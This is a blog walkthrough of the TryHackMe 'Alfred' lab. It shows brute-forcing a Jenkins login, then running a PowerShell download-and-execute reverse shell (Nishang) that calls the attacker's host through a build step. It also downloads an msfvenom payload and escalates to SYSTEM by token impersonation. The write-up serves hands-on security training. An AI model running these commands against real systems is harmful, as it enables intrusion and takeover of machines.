TryHackMe — Alfred Walkthrough

Disclaimer:

This walkthrough is intended for documentation purpose. This is in no way the most efficient way to crack this machine nor the most amazing one. I do such documentation solely for write up and grammar practice LOL. Happy hacking!

Image for post
Image for post

Machine Information:

Image for post
Image for post

Task 1 — How many ports are open?

Image for post
Image for post

Accessing the site http://10.10.54.66:80 does not give much of information.

Image for post
Image for post

There is another port for web service that is open which is the port 8080.

Image for post
Image for post

Task 2 — What is the username and password for the log in panel(in the format username:password)

In order to brute force the login form using Hydra, the URL, Form parameter, and the Login error message should be accurate.

Getting the URL and the Form parameter can be accomplished using Burp.

Image for post
Image for post
Capture this traffic using BurpSuite Proxy
Image for post
Image for post

Parameters for Hydra:

URL: /j_acegi_security_check

USER = j_username

PASS = j_password

Port = 8080

For the username and password, you can use the most common one.

Image for post
Image for post

Successfully logging in to the website using admin:admin.

Image for post
Image for post

One of the notable section of the website is the “project”.

Image for post
Image for post

Accessing the “Configure” section provides the ability to run commands to this server.

Image for post
Image for post

Task 3:

Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it: powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

You first need to download the Powershell script, and make it available for the server to download. You can do this by creating a http server with python: python3 -m http.server

In order to accomplish this task, the Invoke-PowerShellTcp.ps1 should be download to the kali machine and then open a web server using python.

The whole nishang-master can be downloaded from github but since the Invoke-PowerShellTcp.ps1 is the only that is needed, the script can just be downloaded from this link “https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1” and name it as Invoke-PowerShellTcp.ps1.

Open web server on the kali machine using python -m SimpleHTTPServer 80

Image for post
Image for post

In order to download the powershell script into the web server, the Configure feature of the server should be leverage using this command “powershell iex (New-Object Net.WebClient).DownloadString(‘http://10.9.8.234:80/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.9.8.234-Port 1337” and creating a netcat listener on the kali machine using this command “nc -lvnp 1337”.

Image for post
Image for post
Image for post
Image for post

After saving and applying the configuration on the Configure Tab, the “Build Now” must be click in order for the script to take effect.

Image for post
Image for post

Results:

Image for post
Image for post

Task 4: What is the user.txt flag?

Image for post
Image for post

Task 5: What is the final size of the exe payload that you generated?

In order to accomplish this task, create a metasploit payload using msfvenom.

Image for post
Image for post

The final size of the exe file is “73802 bytes”.

Image for post
Image for post

Use this command to download the payload into the target machine powershell “(New-Object System.Net.WebClient).Downloadfile(‘http://10.9.8.234:8000/shells.exe’,’shells.exe’)”

It is important to have the “python -m SimpleHTTPServer 8000" running on the folder which the shells.exe is located.

Image for post
Image for post

Upon successfully executing the command above, the shells.exe will be downloaded onto the target machine.

In order to execute the shells.exe, this command should be used “Start-Process “shells.exe”. But before executing this command, a listener should first be running on the kali machine. In this case it will be the multi/handler.

Image for post
Image for post
Image for post
Image for post
Image for post
Image for post

Now that the listener is running on the kali machine, it’s time to execute the shells.exe .

Image for post
Image for post

If it does not work at the first try, check the LHOST.

Image for post
Image for post

Change it to tun0 or the IP address provided by tryhackme then run the exploit again as well as the shells.exe on the target machine.

Image for post
Image for post

Successfully getting meterpreter shell!

Image for post
Image for post

Task 6: View all the privileges using whoami /priv

Image for post
Image for post

Task 7: You can see that two privileges(SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let's use the incognito module that will allow us to exploit this vulnerability. Enter: load_incognito to load the incognito module in metasploit. Please note, you may need to use the use incognito command if the previous command doesn't work. Also ensure that your metasploit is up to date.

Load incognito!

Image for post
Image for post

List tokens!

Image for post
Image for post
Image for post
Image for post

Impersonate token of the “BUILTIN\Administrator” in order to get the NT AUTHORITY\SYSTEM.

Image for post
Image for post

Task 8: Even though you have a higher privileged token you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions — it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that you migrate to a process with correct permissions (above questions answer). The safest process to pick is the services.exe process. First use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS

Image for post
Image for post

Task 9: read the root.txt file at C:\Windows\System32\config

Image for post
Image for post
Image for post
Image for post

Resources:

https://tryhackme.com/room/alfred

http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html

Written by

Experienced Network Security Engineer with a demonstrated history of working in the field of IT security industry.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store